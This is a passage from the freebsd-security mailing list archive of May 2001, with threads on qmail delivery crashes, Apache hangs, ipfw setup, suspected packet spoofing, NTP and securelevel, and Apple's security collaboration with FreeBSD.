> /me has a similar situation: periodically the machine locks up.
> When at the last second I'm able to run top, I see that swap is filled and
> apache is about 350MB.... Maybe it is a common problem/security issue.
>
> --
> NEVE-RIPE
> ICQ: 36925929 http://www.nevermind.kiev.ua/
> Powered by caffeine. Made with beer.
From owner-freebsd-security Wed May 23 5:37:13 2001 Delivered-To: freebsd-security@freebsd.org Received: from scooby.netsville.com (scooby.netsville.com [206.27.96.131]) by hub.freebsd.org (Postfix) with ESMTP id 6D2F837B42C for ; Wed, 23 May 2001 05:37:10 -0700 (PDT) (envelope-from brandon@vv.com) Received: from brandon by scooby.netsville.com with local (Exim 3.22 #1 (Debian)) id 152XsX-0005UT-00; Wed, 23 May 2001 08:36:41 -0400 Date: Wed, 23 May 2001 08:36:41 -0400 From: Micah Brandon To: Dan Graaff Cc: Robert Clark , Olivier Nicole , veldy@veldy.net, glassfish@frogbox.dyndns.org, freebsd-security@FreeBSD.ORG Subject: Re: Qmail + FreeBSD 4.3 -- resolved Message-ID: <20010523083641.C21004@vv.com> References: <20010522193427.A20063@darkstar.gte.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.3.17i In-Reply-To: ; from subscribed@de-net.org on Tue, May 22, 2001 at 11:53:31PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

* Dan Graaff (subscribed@de-net.org) [010523 02:56]:
> Thanks for the advice everyone, but it looks like the problem just recently
> came out on the vpopmail site! (today in fact)... http://inter7.com/vpopmail/
> They completely re-wrote vdelivermail.. but I think I'm going to wait for a
> stable release..
> just deal with pages of vdelivermail exit 11's

I just jumped on this list and I don't know if this was covered, but I had
this EXACT same problem and the reason was the .qmail-default forwarding
file, which looked something like this:

| /usr/local/vpopmail/bin/vdelivermail '' /usr/local/vpopmail/domains//

Problem was, it pointed to a local "" that did not exist! So, I highly
doubt someone is attacking your machine. Sure, this was some kind of bug in
vdelivermail as it shouldn't have died like that. They've probably corrected
this in the newest version. I'd check all your .qmail-default's (or any other
.qmail files) that may be misdirected as such. You might be able to tell
which is fouled up by associating the exit 11 with a previous delivery
attempt line in your maillog file.

--
Micah Brandon brandon@vv.com
Netsville, Inc. http://www.netsville.com

From owner-freebsd-security Wed May 23 9:16:36 2001 Delivered-To: freebsd-security@freebsd.org Received: from prox.centtech.com (moat2.centtech.com [206.196.95.21]) by hub.freebsd.org (Postfix) with ESMTP id 839F037B423 for ; Wed, 23 May 2001 09:16:30 -0700 (PDT) (envelope-from anderson@centtech.com) Received: (from smap@localhost) by prox.centtech.com (8.9.3+Sun/8.9.3) id IAA18095; Wed, 23 May 2001 08:13:32 -0500 (CDT) Received: from proton.centtech.com(10.177.173.77) by prox via smap (V2.1+anti-relay+anti-spam) id xma018093; Wed, 23 May 01 08:13:20 -0500 Message-ID: <3B0BB771.C03A9DD7@centtech.com> Date: Wed, 23 May 2001 08:13:21 -0500 From: Eric Anderson Reply-To: anderson@centtech.com Organization: Centaur Technology X-Mailer: Mozilla 4.77 [en] (X11; U; Linux 2.2.14-5.0smp i686) X-Accept-Language: en MIME-Version: 1.0 To: Michael Radzewitz Cc: "'security@freebsd.org'" Subject: Re: apache_logs/system hang up References: Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit
Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

It may very well be security related, but it doesn't sound too FreeBSD
related. More apache and linux. Good luck with it...

Eric

Michael Radzewitz wrote:
>
> Hello Alexandr,
>
> currently the system is running under Red Hat Linux 6.2
> with kernel 2.2.14-5.0 and apache 1.3.14 on an Intel i686.
>
> I'll try to reproduce this error. I think it's a security
> issue and should be discussed when an abnormal http-request
> is able to stop a running system.
>
> > -----Original Message-----
> > From: Alexandr P. Kovalenko [mailto:never@uic-in.net]
> > Sent: Wednesday, 23 May 2001 10:37
> > To: Michael Radzewitz
> > Cc: 'security@freebsd.org'
> > Subject: Re: apache_logs/system hang up
> >
> > Hello, Michael Radzewitz!
> >
> > On Wed, May 23, 2001 at 10:00:46AM +0200, you wrote:
> >
> > > Hello Marc,
> > >
> > > the system wasn't able to do anything, so I had to reset it by hand.
> > > Tonight the same thing happened. Actually I would think there must be
> > > something wrong on my site. The characters contain nothing else
> > > than hundreds of these: ^@^@^@
> > > They do not look like a typical binary file. It's always the same
> > > corner of the internet which one of my users visits and which causes the
> > > trouble one minute later.
> > >
> > > Today I plugged a monitor in to see what happened and I got the message:
> > >
> > > login: unable to login
> > >
> > > followed by a kernel panic and the normal core dump output of a linux
> > > system.
> > >
> > > As I mentioned before I think there is something wrong on my site
> > > but I am a little bit concerned about the "unable to login" message.
> > > I will monitor this problem until the end of the week - maybe I get some
> > > more information about it. Later on I will swap the system to FreeBSD.
> > Sorry, what apache versions are you running and what are uname -a's?
> >
> > /me has a similar situation: periodically the machine locks up.
> > When at the last second I'm able to run top, I see that swap is filled and
> > apache is about 350MB.... Maybe it is a common problem/security issue.
> >
> > --
> > NEVE-RIPE
> > ICQ: 36925929 http://www.nevermind.kiev.ua/
> > Powered by caffeine. Made with beer.

--
-------------------------------------------------------------------------------
Eric Anderson anderson@centtech.com
Centaur Technology (512) 418-5792
The idea is to die young as late as possible.
-------------------------------------------------------------------------------

From owner-freebsd-security Wed May 23 9:52: 7 2001 Delivered-To: freebsd-security@freebsd.org Received: from msa4.hinet.net (msa4.hinet.net [168.95.4.214]) by hub.freebsd.org (Postfix) with ESMTP id 5144637B422 for ; Wed, 23 May 2001 09:52:03 -0700 (PDT) (envelope-from clive@tongi.org) Received: from cartier.cirx.org (cartier.cirx.org [211.72.15.243]) by msa4.hinet.net (8.8.8/8.8.8) with SMTP id AAA05270; Thu, 24 May 2001 00:51:40 +0800 (CST) Received: (nullmailer pid 75218 invoked by uid 1000); Wed, 23 May 2001 16:51:39 -0000 Date: Thu, 24 May 2001 00:51:39 +0800 From: Clive Lin To: Matthew Jacob Cc: security@FreeBSD.ORG Subject: Re: ftp security (fwd) Message-ID: <20010524005139.B73422@cartier.cirx.org> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from mjacob@feral.com on Tue, May 22, 2001 at 07:35:56PM -0700 X-PGP-key:
http://www.cirx.org/~clive/clive.asc Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

On Tue, May 22, 2001 at 07:35:56PM -0700, Matthew Jacob wrote:
>
> ---------- Forwarded message ----------
> Date: Wed, 23 May 2001 09:59:08 +0800 (CST)
> From: "[gb2312] Gang Li"
> To: freebsd-bugs@FreeBSD.ORG, freebsd-bug@FreeBSD.ORG
> Subject: ftp security
>
> hi,
> I find ftp.cn.freebsd.org/pub/ports/distfiles
> has 777 privileges, I think it is no good, if it is an

I think phj@cn.FreeBSD.org is in charge of this box. (And other FreeBSD
boxes located in Mainland China.) I've forwarded this message to him.

> error, pls check it soon.
> wish you be better.

--
Clive Lin (Tong-I Lin)
=P clive@tongi.org # Family, friends, private affairs
=F clive@FreeBSD.org # Chinese ports, documentation
=O clive@CirX.ORG # Others
=J.* # What do you think about the 'J' ?

From owner-freebsd-security Wed May 23 14:50:26 2001 Delivered-To: freebsd-security@freebsd.org Received: from stella.pyramus.com (stella.pyramus.com [206.129.206.3]) by hub.freebsd.org (Postfix) with ESMTP id 54D3037B43C for ; Wed, 23 May 2001 14:50:11 -0700 (PDT) (envelope-from turtle@pyramus.com) Received: from pyramus.com (jerry.pyramus.com [206.129.206.8]) by stella.pyramus.com (8.9.3/8.9.3) with ESMTP id OAA23464 for ; Wed, 23 May 2001 14:53:45 -0700 (PDT) (envelope-from turtle@pyramus.com) Message-ID: <3B0C3130.11D3DCBA@pyramus.com> Date: Wed, 23 May 2001 14:52:49 -0700 From: Bill Mitcheson X-Mailer: Mozilla 4.75 [en] (Windows NT 5.0; U) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-security@FreeBSD.ORG Subject: ipfw problems.
Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

I am having major problems setting up one of my computers as a firewall
machine. I rebuilt the kernel as listed in the diary. I followed all
instructions at www.freebsddiary.org/ipfw.php and I cannot get it to pass
packets from an outside machine to the inside machine. I can ping my router
on the outside from the LAN address 10.10.1.2 but not vice versa. I may need
someone to hold my hand through the setup process so I can get it right. Any
help you may provide will be appreciated!

Bill Mitcheson.
Network Administrator, Pyramus Online.

From owner-freebsd-security Wed May 23 15:15:22 2001 Delivered-To: freebsd-security@freebsd.org Received: from R181204.resnet.ucsb.edu (R181204.resnet.ucsb.edu [128.111.181.204]) by hub.freebsd.org (Postfix) with ESMTP id 5C9F437B423 for ; Wed, 23 May 2001 15:15:15 -0700 (PDT) (envelope-from mudman@R181204.resnet.ucsb.edu) Received: from localhost (mudman@localhost) by R181204.resnet.ucsb.edu (8.11.1/8.11.1) with ESMTP id f4NMOtk73666 for ; Wed, 23 May 2001 15:24:55 -0700 (PDT) (envelope-from mudman@R181204.resnet.ucsb.edu) Date: Wed, 23 May 2001 15:24:55 -0700 (PDT) From: mudman To: Subject: service attacks Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

I'm somewhat of a greenhorn on how packets are handled in FreeBSD.
Apparently, some character has been throwing some bad packets at me.
Kernel message like:

arp: bad hardware address format (0x800)

Then like 3 hours later (probably after a very slow, stealthy port scan),
two of my services on high ports segfault.

If someone sends a packet to port XXXX, does it get dropped or filtered by
the kernel if it is bad, or is the information processing up to the
service on port XXXX?

Actually, a few of those services really don't need to be accessed by the
outside world. I'm thinking of setting up IPFW.

Anyway, what should I make of this?

Oh yeah, one more thing. tcpdump has bogus ip addresses (japan, france,
korea, etc..). Err, not to assert these places are bogus, but with the
way they vary I think it is the same person falsifying packets w/
different sources.

This individual has been bothering me since January actually (with this
stuff as well as DoS/packet spam). I would like to get him sent to
prison. Any suggestions how I go about finding out who he is and how to
put him out?

From owner-freebsd-security Wed May 23 15:38:38 2001 Delivered-To: freebsd-security@freebsd.org Received: from nsmail.corp.globalstar.com (gibraltar.globalstar.com [207.88.248.142]) by hub.freebsd.org (Postfix) with ESMTP id 166CC37B43E for ; Wed, 23 May 2001 15:38:25 -0700 (PDT) (envelope-from crist.clark@globalstar.com) Received: from globalstar.com ([207.88.153.184]) by nsmail.corp.globalstar.com (Netscape Messaging Server 4.15) with ESMTP id GDT87E00.69R; Wed, 23 May 2001 15:38:02 -0700 Message-ID: <3B0C3BE0.F263E036@globalstar.com> Date: Wed, 23 May 2001 15:38:24 -0700 From: "Crist Clark" Organization: Globalstar LP X-Mailer: Mozilla 4.77 [en] (WinNT; U) X-Accept-Language: en MIME-Version: 1.0 To: mudman Cc: freebsd-security@FreeBSD.ORG Subject: Re: service attacks References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk
mudman wrote:
>
> I'm somewhat of a greenhorn on how packets are handled in FreeBSD.
> Apparently, some character has been throwing some bad packets at me.
> Kernel message like:
>
> arp: bad hardware address format (0x800)
>
> Then like 3 hours later (probably after a very slow, stealthy port scan),
> two of my services on high ports segfault.

The two are not likely related. The 'bad hardware address format' error indicates that there is some problem, or something the kernel does not understand anyway, in the link layer header. A link layer header does not cross the Internet. Unless your attacker is on your LAN, i.e. no router between you two, he could not be causing the ARP messages.

> If someone sends a packet to port XXXX, does it get dropped or filtered by
> the kernel if it is bad, or is the information processing up to the
> service on port XXXX?

Depends on what you mean by "bad information." As for your ARP messages, those frames are never going to even get processed at the IP layer. If the information in packet headers is "bad," the kernel will not understand them and drop the packet. If the kernel understands the headers, the information is not "bad" and it gets to where it is supposed to go.

> Actually, a few of those services really don't need to be accessed by the
> outside world. I'm thinking of setting up IPFW.

Good.

> Anyway, what should I make of this?

If people are crashing your services, you need to (a) turn them off if you don't really need them, (b) patch them if they have known problems, or (c) firewall them so only the people you have some trust in can access them.

> Oh yeah, one more thing. tcpdump has bogus ip addresses (japan, france,
> korea, etc..). Err, not to assert these places are bogus, but with the
> way they vary I think it is the same person falsifying packets w/
> different sources.

Why do you think that?
> This individual has been bothering me since January actually (with this
> stuff as well as DoS/packet spam). I would like to get him sent to
> prison. Any suggestions how I go about finding out who he is and how to
> put him out?

How do you know this is one person now? All you can (should) do is collect information about the data being sent to you and try to trace it back to the attacker(s).

--
Crist J. Clark
Network Security Engineer
crist.clark@globalstar.com
Globalstar, L.P.
(408) 933-4387
FAX: (408) 933-4926


From owner-freebsd-security Wed May 23 16:16:09 2001
Message-ID: <000b01c0e3de$5ce01c90$01000001@book>
From: "alexus"
To: "Bill Mitcheson"
References: <3B0C3130.11D3DCBA@pyramus.com>
Subject: Re: ipfw problems.
Date: Wed, 23 May 2001 19:16:14 -0400

show us your /etc/rc.conf file

----- Original Message -----
From: "Bill Mitcheson"
Sent: Wednesday, May 23, 2001 5:52 PM
Subject: ipfw problems.


From owner-freebsd-security Wed May 23 16:34:14 2001
Date: Wed, 23 May 2001 16:34:07 -0700
From: "R.P. Aditya"
To: freebsd-security@freebsd.org
Subject: Apple and FreeBSD Security Collaboration
Message-ID: <20010523163407.A77156@mighty.grot.org>

Add another feather to the cap of FreeBSD:

From

  http://www.apple.com/support/security/security.html

Collaboration with other security groups
...
Apple also works very closely with the FreeBSD Security team to analyze and
release patches for security vulnerabilities.


From owner-freebsd-security Wed May 23 16:36:30 2001
Message-ID: <001a01c0e3e1$320e0420$01000001@book>
From: "alexus"
Subject: Re: Mail delivery failure notification <netbuilder@naver.com>
Date: Wed, 23 May 2001 19:36:31 -0400

Naver Mail

please take this e-mail off of the list

thank you

----- Original Message -----
From: NAVER-MAILER@naver.com
To: ml@db.nexgen.com
Sent: Wednesday, May 23, 2001 7:16 PM
Subject: Mail delivery failure notification

The mail you sent to 박진형 (netbuilder) failed to be delivered for the following reason.

--------------------------------------------

The recipient's mailbox storage is full. Please try again later.

--------------------------------------------


From owner-freebsd-security Wed May 23 17:00:26 2001
Date: Wed, 23 May 2001 20:00:17 -0400
From: Peter Chiu
Message-ID: <12368087094.20010523200017@ipfw.org>
To: mudman
Cc: freebsd-security@freebsd.org
Subject: Re: service attacks

Hello mudman,

Wednesday, May 23, 2001, 6:24:55 PM, you wrote:

m> I'm somewhat of a greenhorn on how packets are handled in FreeBSD.
m> Apparently, some character has been throwing some bad packets at me.
m> Kernel message like:
m> arp: bad hardware address format (0x800)

Can you describe your environment? I am on cable and I got these messages once or twice per day.
From owner-freebsd-security Wed May 23 17:17:31 2001
Message-Id: <4.2.2.20010523201612.01aa97e0@192.168.0.12>
Date: Wed, 23 May 2001 20:17:20 -0400
To: freebsd-security@freebsd.org
From: Mike Tancsa
Subject: Re: Apple and FreeBSD Security Collaboration
In-Reply-To: <20010523163407.A77156@mighty.grot.org>

I hate to be so cynical and not accept it at face value, but is it true? Do they really work closely with the security officer(s)?

---Mike

At 04:34 PM 5/23/2001 -0700, R.P. Aditya wrote:
>Add another feather to the cap of FreeBSD:
>
>From
>
> http://www.apple.com/support/security/security.html
>
>Collaboration with other security groups
>...
>Apple also works very closely with the FreeBSD Security team to analyze and
>release patches for security vulnerabilities.
--------------------------------------------------------------------
Mike Tancsa, tel +1 519 651 3400
Network Administration, mike@sentex.net
Sentex Communications www.sentex.net
Cambridge, Ontario Canada www.sentex.net/mike


From owner-freebsd-security Wed May 23 19:31:03 2001
From: "Michael Tang Helmeste"
Subject: setting time without changing securelevel
Date: Wed, 23 May 2001 22:29:54 -0400

Is there any way to allow NTP to set my time without changing my securelevel?
I run NTP through cron, but whenever it tries to change the clock, FreeBSD just changes it back to what it was before. I don't want to have to run at a lower securelevel, but only to allow changing the time. Is this possible? Thanks.


From owner-freebsd-security Wed May 23 22:28:53 2001
Date: Thu, 24 May 2001 11:28:42 +0600
From: "Sergey N. Voronkov"
To: Michael Tang Helmeste
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: setting time without changing securelevel
Message-ID: <20010524112842.A33408@sv.tech.sibitex.tmn.ru>

On Wed, May 23, 2001 at 10:29:54PM -0400, Michael Tang Helmeste wrote:
> Is there any way to allow NTP to set my time without changing my
> securelevel? I run NTP through cron, but whenever it tries to change the
> clock, FreeBSD just changes it back to what it was before. I don't want to
> have to run at a lower securelevel, but only to allow changing the time.
> Is
> this possible? Thanks.
>

ntpd -x ?

[from man ntpd]

-x  Ordinarily, if the time is to be adjusted more than 128 ms, it is
    stepped, not gradually slewed. This option forces the time to be
    slewed in all cases. Note: since the slew rate is limited to 0.5
    ms/s, each second of adjustment requires an amortization interval
    of 2000 s. Thus, an adjustment of many seconds can take hours or
    days to amortize.

Bye, Serg.


From owner-freebsd-security Thu May 24 00:22:48 2001
Date: Thu, 24 May 2001 03:22:26 -0400 (EDT)
From: "Andrew R. Reiter"
To: "R.P. Aditya"
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Apple and FreeBSD Security Collaboration
In-Reply-To: <20010523163407.A77156@mighty.grot.org>

Let's hope they fix a number of vulns in their own code as well :-/

On Wed, 23 May 2001, R.P. Aditya wrote:

> Add another feather to the cap of FreeBSD:
>
> From
>
> http://www.apple.com/support/security/security.html
>
> Collaboration with other security groups
> ...
> Apple also works very closely with the FreeBSD Security team to analyze and
> release patches for security vulnerabilities.
--
Andrew R. Reiter
arr@fledge.watson.org
"It requires a very unusual mind to undertake the analysis of the obvious" -- A.N. Whitehead


From owner-freebsd-security Thu May 24 04:58:09 2001
Date: Thu, 24 May 2001 14:58:15 +0300 (IDT)
From: Roman Shterenzon
To: John Braun
Subject: Re: Problems with Amavis setup
In-Reply-To: <20010508135942.70161.qmail@web13804.mail.yahoo.com>
Organization: Xpert UNIX Systems Ltd.

I'm reading this mailing list with some delay, and perhaps people already answered your question, but as a maintainer of amavis-perl I did a small change to amavis to work even with file(1) which doesn't have -b. The port is available since December via /usr/ports/security/amavis-perl

I need to take a look if it needs upgrading.

On Tue, 8 May 2001, John Braun wrote:

> Of course, FreeBSD has this command, but
> Amavis requires command file with option -b.
> If I don't mistake in version 4.1. hasn't this
> option.
>
> Where can I get source or package for this command?
>
> Or someone know how to install Amavis without 'file
> -b'?
>
>
> --- Peter Pentchev wrote:
> > On Tue, May 08, 2001 at 02:40:02AM -0700, John Braun wrote:
> > > Hi!
> > >
> > > I can't download "file" command for "Amavis" from
> > >
> > > ftp://ftp.astron.com/pub/file/,
> > > ftp://ftp.gw.com/pub/unix/file/ and
> > > ftp://ftp.funet.fi/pub/unix/tools/file/.
> > >
> > > Where can I get this command ?
> >
> > The 'file' command is part of FreeBSD; it is installed as part of
> > the FreeBSD installation. Look for it in /usr/bin. If Amavis
> > cannot execute the 'file' command, make sure it has /usr/bin in
> > its path.
> >
> > G'luck,
> > Peter
> >
> > --
> > This sentence no verb.
>

--Roman Shterenzon, UNIX System Administrator and Consultant
[ Xpert UNIX Systems Ltd., Herzlia, Israel.
Tel: +972-9-9522361 ]


From owner-freebsd-security Thu May 24 05:13:38 2001
Message-ID: <20010524121332.56295.qmail@web13804.mail.yahoo.com>
Date: Thu, 24 May 2001 05:13:32 -0700 (PDT)
From: John Braun
Subject: Re: Problems with Amavis setup
To: Roman Shterenzon
Cc: freebsd-security@freebsd.org

As a maintainer, which antivirus scanner You can recommend to use with Amavis?

--- Roman Shterenzon wrote:
> I'm reading this mailing list with some delay, and
> perhaps people already
> answered your question, but as a maintainer of
> amavis-perl I did small
> change to amavis to work even with file(1) which
> doesn't have -b.
> The port is available since December via
> /usr/ports/security/amavis-perl
>
> I need to take a look if it needs upgrading.
From owner-freebsd-security Thu May 24 07:30:27 2001
Date: Thu, 24 May 2001 10:30:13 -0400 (EDT)
From: Rob Simmons
To: Michael Tang Helmeste
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: setting time without changing securelevel

If you set the time at boot by adding ntpdate_enable="YES" to /etc/rc.conf and you set ntp to adjust the time frequently enough, it won't adjust the clock by more than the 1 second restriction.

Robert Simmons
Systems Administrator
http://www.wlcg.com/

On Wed, 23 May 2001, Michael Tang Helmeste wrote:

> Is there any way to allow NTP to set my time without changing my
> securelevel? I run NTP through cron, but whenever it tries to change the
> clock, FreeBSD just changes it back to what it was before. I don't want to
> have to run at a lower securelevel, but only to allow changing the time. Is
> this possible? Thanks.
From owner-freebsd-security Thu May 24 07:45:35 2001
Message-ID: <002001c0e45f$f1eb4e50$3028680a@tgt.com>
From: "Thomas T. Veldhouse"
To: "Rob Simmons"
Subject: Re: setting time without changing securelevel
Date: Thu, 24 May 2001 09:43:48 -0500

You probably shouldn't run it through cron. Especially if you are running a database on your machine. You probably want to run ntpd (via xntpd_enable knob). It is not hard to set up, but the documentation [that is readable] is scarce.
Tom Veldhouse
veldy@veldy.net

----- Original Message -----
From: "Rob Simmons"
To: "Michael Tang Helmeste"
Sent: Thursday, May 24, 2001 9:30 AM
Subject: Re: setting time without changing securelevel

> If you set the time at boot by adding ntpdate_enable="YES" to /etc/rc.conf
> and you set ntp to adjust the time frequently enough, it won't adjust the
> clock by more than the 1 second restriction.


From owner-freebsd-security Thu May 24 11:28:07 2001
Date: Thu, 24 May 2001 11:28:03 -0700
From: Kris Kennaway
To: Mike Tancsa
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Apple and FreeBSD Security Collaboration
Message-ID: <20010524112803.F31151@xor.obsecurity.org>
References: <20010523163407.A77156@mighty.grot.org> <4.2.2.20010523201612.01aa97e0@192.168.0.12>
In-Reply-To: <4.2.2.20010523201612.01aa97e0@192.168.0.12>

On Wed, May 23, 2001 at 08:17:20PM -0400, Mike Tancsa wrote:
>
> I hate to be so cynical and not accept it at face value, but is it true ?
> Do they really work closely with the security officer(s) ?

Yes, we have a shared mailing list and pass on things like advisory drafts and vulnerability information reported to us.
Kris --tmoQ0UElFV5VgXgH Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.5 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7DVKyWry0BWjoQKURAvweAKDcSoCDDgmghRshmZ5+/Wxsty/+IwCgiC3a 1l/JA4usrzAiiF0zZngmUMI= =S+AC -----END PGP SIGNATURE----- --tmoQ0UElFV5VgXgH-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 24 12:25:18 2001 Delivered-To: freebsd-security@freebsd.org Received: from host213-123-129-85.btopenworld.com (host213-123-129-85.btopenworld.com [213.123.129.85]) by hub.freebsd.org (Postfix) with ESMTP id 96AEE37B423 for ; Thu, 24 May 2001 12:25:11 -0700 (PDT) (envelope-from dominic@host213-123-129-85.btopenworld.com) Received: (from dominic@localhost) by host213-123-129-85.btopenworld.com (8.11.3/8.11.3) id f4OJP7K00758; Thu, 24 May 2001 20:25:07 +0100 (BST) (envelope-from dominic) Date: Thu, 24 May 2001 20:25:06 +0100 From: Dominic Marks To: "Thomas T. Veldhouse" Cc: freebsd-security@freebsd.org Subject: Re: setting time without changing securelevel Message-ID: <20010524202506.B466@apollo> References: <002001c0e45f$f1eb4e50$3028680a@tgt.com> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="opJtzjQTFsWo+cga" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <002001c0e45f$f1eb4e50$3028680a@tgt.com>; from veldy@veldy.net on Thu, May 24, 2001 at 09:43:48AM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --opJtzjQTFsWo+cga Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable Hello, On Thu, May 24, 2001 at 09:43:48AM -0500, Thomas T. Veldhouse wrote: > knob). 
It is not hard to setup, but the documentation [that is readable] is > scarce. > > Tom Veldhouse > veldy@veldy.net I suggest: http://freebsddiary.org/xntpd.html One problem I had was having to create an /etc/localtime as there wasn't one on the machine to begin with. Symlinking it to my city in /usr/share/zoneinfo/etc/etc works great in combination with the processes described in the above article. -- Dominic Marks Don't talk to me about Naval tradition. It's nothing but rum, sodomy and the lash." -- Winston Churchill --opJtzjQTFsWo+cga Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7DWAR5FwHMNbbKFkRAsQ9AJ9NpZ0cHDEEfkNnAKXUyXNrS6ZjugCfaoZQ ZbQuO1+C4xCe41+BYVVOmLM= =isMX -----END PGP SIGNATURE----- --opJtzjQTFsWo+cga-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 24 12:33:18 2001 Delivered-To: freebsd-security@freebsd.org Received: from veldy.net (w028.z064001117.msp-mn.dsl.cnc.net [64.1.117.28]) by hub.freebsd.org (Postfix) with ESMTP id B86AD37B424 for ; Thu, 24 May 2001 12:33:12 -0700 (PDT) (envelope-from veldy@veldy.net) Received: from HP2500B (fuggle.veldy.net [64.1.117.28]) by veldy.net (Postfix) with SMTP id B8C1CBA40; Thu, 24 May 2001 14:33:11 -0500 (CDT) Message-ID: <006b01c0e488$25f12620$3028680a@tgt.com> From: "Thomas T.
Veldhouse" To: "Dominic Marks" Cc: References: <002001c0e45f$f1eb4e50$3028680a@tgt.com> <20010524202506.B466@apollo> Subject: Re: setting time without changing securelevel Date: Thu, 24 May 2001 14:31:36 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I found a similar article myself (I don't remember the URL though). I have had it running for quite some time (well -- a week or so). I didn't see that it recommends you use more than one server to synchronize with. I am currently using 4 public servers. That looks like a pretty decent article. It, like the rest, fails to inform you how to run your new server as a time server for the rest of your network. I can ntptrace to it on the local machine, but it won't respond to other clients on my LAN. Tom Veldhouse veldy@veldy.net ----- Original Message ----- From: "Dominic Marks" To: "Thomas T. Veldhouse" Cc: Sent: Thursday, May 24, 2001 2:25 PM Subject: Re: setting time without changing securelevel Hello, On Thu, May 24, 2001 at 09:43:48AM -0500, Thomas T. Veldhouse wrote: > knob). It is not hard to setup, but the documentation [that is readable] is > scarce. > > Tom Veldhouse > veldy@veldy.net I suggest: http://freebsddiary.org/xntpd.html One problem I had was having to create an /etc/localtime as there wasn't one on the machine to begin with. Symlinking it to my city in /usr/share/zoneinfo/etc/etc works great in combination with the processes described in the above article. -- Dominic Marks Don't talk to me about Naval tradition. It's nothing but rum, sodomy and the lash."
-- Winston Churchill To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 24 12:33:54 2001 Delivered-To: freebsd-security@freebsd.org Received: from imr2.ericy.com (imr2.ericy.com [12.34.240.68]) by hub.freebsd.org (Postfix) with ESMTP id 1262637B422 for ; Thu, 24 May 2001 12:33:50 -0700 (PDT) (envelope-from Antoine.Beaupre@ericsson.ca) Received: from mr6.exu.ericsson.se (mr6att.ericy.com [138.85.92.14]) by imr2.ericy.com (8.11.3/8.11.3) with ESMTP id f4OJVA818964; Thu, 24 May 2001 14:31:10 -0500 (CDT) Received: from noah.lmc.ericsson.se (noah.lmc.ericsson.se [142.133.1.1]) by mr6.exu.ericsson.se (8.11.3/8.11.3) with ESMTP id f4OJV9G01202; Thu, 24 May 2001 14:31:09 -0500 (CDT) Received: from lmc35.lmc.ericsson.se (lmc35.lmc.ericsson.se [142.133.16.175]) by noah.lmc.ericsson.se (8.11.2/8.9.2) with ESMTP id f4OJV8G16289; Thu, 24 May 2001 15:31:09 -0400 (EDT) Received: by lmc35.lmc.ericsson.se with Internet Mail Service (5.5.2653.19) id ; Thu, 24 May 2001 15:31:07 -0400 Received: from lmc.ericsson.se (lmcpc100455.pc.lmc.ericsson.se [142.133.23.150]) by LMC37.lmc.ericsson.se with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2653.13) id LSDSC5LC; Thu, 24 May 2001 15:31:02 -0400 From: "Antoine Beaupre (LMC)" To: Dominic Marks Cc: "Thomas T. 
